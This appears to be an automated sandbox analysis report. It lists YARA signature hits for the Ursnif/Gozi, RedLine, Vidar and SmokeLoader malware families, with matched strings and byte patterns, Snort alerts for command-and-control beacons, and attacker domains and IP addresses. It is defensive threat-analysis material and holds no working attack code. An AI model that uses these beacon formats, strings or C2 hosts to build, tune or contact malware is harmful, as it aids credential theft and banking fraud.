Process Memory Space: 6644.exe PID: 1916	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x15d4c:$a5: filename="%.4u.%lu" 0x1604a:$a5: filename="%.4u.%lu" 0x15814:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xd9:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x231:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xd947:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xd96c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xdaf8:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x15741:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x15b02:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x15e05:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x161d0:$a9: &whoami=%s 0x161b8:$a10: %u.%u_%u_%u_x%u 0x15cc6:$a11: size=%u&hash=0x%08x 0x15cbb:$a12: &uptime=%u 0x1613b:$a13: %systemroot%\system32\c_1252.nls 0x162dd:$a13: %systemroot%\system32\c_1252.nls 0x16281:$a14: IE10RunOnceLastShown_TIMESTAMP
Process Memory Space: 6644.exe PID: 1916	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x15c7b:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x15f7c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x15814:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x159c0:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x15d18:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16016:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x15bac:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x15eb0:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x15ddc:$a9: Software\AppDataLow\Software\Microsoft\ 0x160e1:$a9: Software\AppDataLow\Software\Microsoft\ 0x16c88:$a9: Software\AppDataLow\Software\Microsoft\ 0x16cd5:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: 86EE.exe PID: 4972	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 8C00.exe PID: 5400	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 86EE.exe PID: 5560	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 8C00.exe PID: 5936	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: explorer.exe PID: 1768	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 5080	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 62 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.tiddsjj.930e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.2B4A.exe.2840000.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2840000.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
11.3.tiddsjj.950000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.2B4A.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.2B4A.exe.740e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.740e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
19.2.6644.exe.950000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
12.2.2B4A.exe.2540000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2540000.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.2.S2XJ2wbz7u.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.2B4A.exe.2840000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2840000.6.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.2.2B4A.exe.2540ee8.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2540ee8.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
19.2.6644.exe.12794a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
11.2.tiddsjj.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.2B4A.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.2B4A.exe.22ba196.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.22ba196.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.3.2B4A.exe.856710.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.3.2B4A.exe.856710.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.3.2B4A.exe.780000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.3.2B4A.exe.780000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.2B4A.exe.22ba196.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.22ba196.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x33ff6:$pat14: , CommandLine: 0x22ebe:$v2_1: ListOfProcesses 0x21374:$v4_3: base64str 0x21333:$v4_4: stringKey 0x2137e:$v4_5: BytesToStringConverted 0x21369:$v4_6: FromBase64 0x22b7b:$v4_8: procName 0x1ff3c:$v5_1: DownloadAndExecuteUpdate 0x1ff64:$v5_2: ITaskProcessor 0x1ff2a:$v5_3: CommandLineUpdate 0x1ff55:$v5_4: DownloadUpdate 0x1fe9e:$v5_5: FileScanning 0x2013c:$v5_7: RecordHeaderField 0x20066:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.2B4A.exe.2540ee8.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2540ee8.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
19.2.6644.exe.12794a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
12.2.2B4A.exe.22bb07e.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.22bb07e.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
14.2.453D.exe.774fd8.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.453D.exe.774fd8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.2.2B4A.exe.2540000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.2540000.5.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x33ff6:$pat14: , CommandLine: 0x22ebe:$v2_1: ListOfProcesses 0x21374:$v4_3: base64str 0x21333:$v4_4: stringKey 0x2137e:$v4_5: BytesToStringConverted 0x21369:$v4_6: FromBase64 0x22b7b:$v4_8: procName 0x1ff3c:$v5_1: DownloadAndExecuteUpdate 0x1ff64:$v5_2: ITaskProcessor 0x1ff2a:$v5_3: CommandLineUpdate 0x1ff55:$v5_4: DownloadUpdate 0x1fe9e:$v5_5: FileScanning 0x2013c:$v5_7: RecordHeaderField 0x20066:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
14.2.453D.exe.774fd8.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.453D.exe.774fd8.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1f430:$pat14: , CommandLine: 0x17162:$v2_1: ListOfProcesses 0x16eed:$v4_3: base64str 0x17f81:$v4_4: stringKey 0x14b08:$v4_5: BytesToStringConverted 0x13b70:$v4_6: FromBase64 0x152dc:$v4_8: procName 0x1565f:$v5_1: DownloadAndExecuteUpdate 0x16dfd:$v5_2: ITaskProcessor 0x1564d:$v5_3: CommandLineUpdate 0x1563e:$v5_4: DownloadUpdate 0x15cf1:$v5_5: FileScanning 0x14e77:$v5_7: RecordHeaderField 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.2.2B4A.exe.22bb07e.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.2B4A.exe.22bb07e.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
12.3.2B4A.exe.856710.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.3.2B4A.exe.856710.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 40 entries

Snort Signatures

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849729802851815 11/19/22-10:38:14.789628
SID:	2851815
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849733802851815 11/19/22-10:38:20.903452
SID:	2851815
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849725802851815 11/19/22-10:38:10.657737
SID:	2851815
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Single char EXE direct download likely trojan (multiple families) - Source IP: 192.168.2.3 - Destination IP: 89.208.107.216

Timestamp:	192.168.2.389.208.107.21649738802018581 11/19/22-10:38:23.294845
SID:	2018581
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com

Source: unknown	HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match	File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: tiddsjj, 0000000B.00000002.378644024.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
